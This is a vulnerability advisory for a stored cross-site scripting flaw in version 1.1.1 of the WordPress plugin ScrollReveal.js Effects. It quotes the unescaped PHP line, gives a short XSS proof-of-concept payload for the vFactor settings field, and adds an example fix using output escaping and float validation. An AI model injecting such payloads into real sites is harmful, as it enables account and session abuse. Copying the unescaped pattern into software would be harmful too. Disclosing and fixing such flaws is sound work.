WordPress ScrollReveal.js Effects 1.1.1 Cross Site Scripting
WordPress ScrollReveal.js Effects plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.
# Exploit Title: WordPress Plugin ScrollReveal.js Effects - Stored Cross Site Scripting
# Date: 25-04-2022
# Exploit Author: Mariam Tariq - Hunt3rsherlock_
# Vendor Homepage: https://wordpress.org/plugins/scrollrevealjs-effects/
# Version: 1.1.1
# Tested on: Firefox
# Contact me: [email protected]

# Vulnerable Code:

```
<input id="src-opacity" type="text" name="sr_config[vFactor]" value="<?php echo $options['vFactor']; ?>" placeholder="Element ratio in float" />
```

The stored `vFactor` option is echoed into the `value` attribute without escaping, so a value containing a double quote closes the attribute and the rest is parsed as markup each time the settings page is rendered.

# POC

1. Install the ScrollReveal.js Effects WordPress plugin and activate it.
2. Go to the plugin configuration and, in the vFactor field, inject the XSS payload “><img src=xonerror=alert(‘’XSS>
3. The XSS will trigger.

## PoC Image

https://imgur.com/a/uQRT2mD
https://imgur.com/1BB80ep
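
# Hardened form (added example)

The following is an added example, not code from the plugin or from the advisory author: it shows the vulnerable field rendered with attribute escaping plus save-time validation of the value as a float. The names `sr_sanitize_config`, `sr_render_vfactor` and `sr_settings_group` are hypothetical, and the option name `sr_config` is assumed from the field's `name` attribute.

```php
<?php
// Added example: stand-in so this file also runs outside WordPress.
// Inside WordPress, core's esc_attr() is already defined and is used instead.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Save-time validation (hypothetical callback name). The field's placeholder
// says vFactor is a float ratio, so anything non-numeric is discarded.
// Other sr_config keys pass through here and need their own validation.
function sr_sanitize_config($input) {
    $clean = is_array($input) ? $input : array();
    $raw   = (isset($clean['vFactor']) && is_scalar($clean['vFactor']))
        ? trim((string) $clean['vFactor']) : '';
    $clean['vFactor'] = is_numeric($raw) ? (string) (float) $raw : '';
    return $clean;
}

// Output-time escaping (hypothetical helper name): same markup as the
// vulnerable line, with the stored value encoded for an attribute context.
function sr_render_vfactor(array $options) {
    $value = isset($options['vFactor']) ? $options['vFactor'] : '';
    return '<input id="src-opacity" type="text" name="sr_config[vFactor]" value="'
        . esc_attr($value) . '" placeholder="Element ratio in float" />';
}

// Wiring inside WordPress. 'sr_settings_group' is an assumed group name.
if (function_exists('add_action')) {
    add_action('admin_init', function () {
        register_setting('sr_settings_group', 'sr_config',
            array('sanitize_callback' => 'sr_sanitize_config'));
    });
} else {
    // Stand-alone run with a constructed value that tries to close the attribute.
    $stored = array('vFactor' => '"><b>constructed</b>');
    echo sr_render_vfactor($stored), "\n";             // escaped at output time
    var_dump(sr_sanitize_config($stored)['vFactor']);  // discarded at save time
    var_dump(sr_sanitize_config(array('vFactor' => ' 0.6 '))['vFactor']);
}
```

Escaping at output is the fix for the line shown above; the save-time check is defence in depth and does not replace it, since values already stored before the fix are still rendered.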